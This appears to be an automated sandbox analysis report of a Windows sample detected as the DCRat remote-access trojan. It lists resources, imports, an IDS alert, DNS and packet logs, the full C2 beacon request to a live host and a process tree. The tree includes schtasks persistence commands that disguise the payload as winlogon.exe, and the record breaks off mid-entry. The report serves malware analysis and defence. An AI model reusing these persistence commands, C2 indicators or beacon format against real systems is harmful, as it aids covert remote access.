RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-31T09:22:11.861438+0200 | TCP | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2024 09:22:11.156493902 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.161345005 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.161905050 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.162435055 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.167217970 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861377954 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861390114 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861401081 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861423016 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861432076 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861438036 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.861443043 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861468077 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861483097 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861500025 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861526012 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.861538887 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.861939907 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.866261005 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.866308928 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.866318941 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.866492987 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.976166964 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976176977 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976250887 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976262093 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976273060 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976299047 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.976478100 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976494074 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976504087 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.976505041 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976520061 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976530075 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.976560116 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.977144003 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977164984 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977174997 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977220058 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977231026 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977936029 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977946043 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977957964 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977972984 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977988005 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.977998018 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.978849888 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.978883028 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.979779959 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.980010033 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.981156111 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.981165886 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.981178045 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.981189966 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:11.981211901 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:11.981304884 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.090919018 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.090929031 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091114044 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.091155052 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091185093 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091193914 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091204882 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091216087 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091273069 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091283083 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091294050 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091310024 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091320992 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091337919 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.091368914 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.091546059 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.098903894 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.103756905 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.312961102 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.312973022 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.312988043 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.312999010 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313009024 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313013077 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313019037 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313030005 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313040018 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313051939 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313060045 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313067913 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313072920 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313204050 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313251972 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313271046 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313282013 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313298941 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313314915 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313369989 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313381910 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313390970 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313391924 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313415051 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313436985 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313488960 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313508034 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313518047 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313528061 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313539982 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313543081 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313551903 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.313568115 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.313601017 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314023972 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314065933 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314075947 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314115047 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314137936 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314152956 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314162970 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314172983 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314188004 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314205885 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314249992 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314260006 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314270020 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314280033 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314290047 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314296961 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314304113 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.314310074 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.314347982 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.315037966 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315049887 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315061092 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315088034 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.315114975 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315124989 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315135956 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315154076 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315159082 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.315165043 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315181971 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315192938 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315196991 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.315203905 CEST | 80 | 49734 | 141.8.194.149 | 192.168.2.4
Aug 31, 2024 09:22:12.315222979 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.315238953 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Aug 31, 2024 09:22:12.324552059 CEST | 49734 | 80 | 192.168.2.4 | 141.8.194.149
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2024 09:22:11.136359930 CEST | 59771 | 53 | 192.168.2.4 | 1.1.1.1
Aug 31, 2024 09:22:11.146543980 CEST | 53 | 59771 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 31, 2024 09:22:11.136359930 CEST | 192.168.2.4 | 1.1.1.1 | 0xec1b | Standard query (0) | a1023624.xsph.ru | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 31, 2024 09:22:11.146543980 CEST | 1.1.1.1 | 192.168.2.4 | 0xec1b | No error (0) | a1023624.xsph.ru | - | 141.8.194.149 | A (IP address) | IN (0x0001) | false
                              • a1023624.xsph.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 141.8.194.149 | 80 | 7900 | C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 09:22:11.162435055 CEST | 477 | OUT | GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1
                              Accept: */*
                              Content-Type: text/css
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                              Host: a1023624.xsph.ru
                              Connection: Keep-Alive
Aug 31, 2024 09:22:11.861377954 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                              Server: openresty
                              Date: Sat, 31 Aug 2024 07:22:11 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Vary: Accept-Encoding
                              Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-betwe [TRUNCATED]
Aug 31, 2024 09:22:12.098903894 CEST | 453 | OUT | GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1
                              Accept: */*
                              Content-Type: text/css
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                              Host: a1023624.xsph.ru
Aug 31, 2024 09:22:12.312961102 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                              Server: openresty
                              Date: Sat, 31 Aug 2024 07:22:12 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Vary: Accept-Encoding



                              Target ID:0
                              Start time:03:21:51
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\5P9EdUgv5r.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\5P9EdUgv5r.exe"
                              Imagebase:0xd60000
                              File size:1'577'715 bytes
                              MD5 hash:1F70E167B93D471AF9DAF333145DB4CD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:03:21:51
                              Start date:31/08/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
                              Imagebase:0xef0000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:2
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:03:22:02
                              Start date:31/08/2024
                              Path:C:\serversessionmonitor\blockfont.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\serversessionmonitor\blockfont.exe"
                              Imagebase:0xf50000
                              File size:1'260'544 bytes
                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 88%, ReversingLabs
• Detection: 68%, Virustotal
                              Reputation:low
                              Has exited:true

                              Target ID:7
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:03:22:04
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
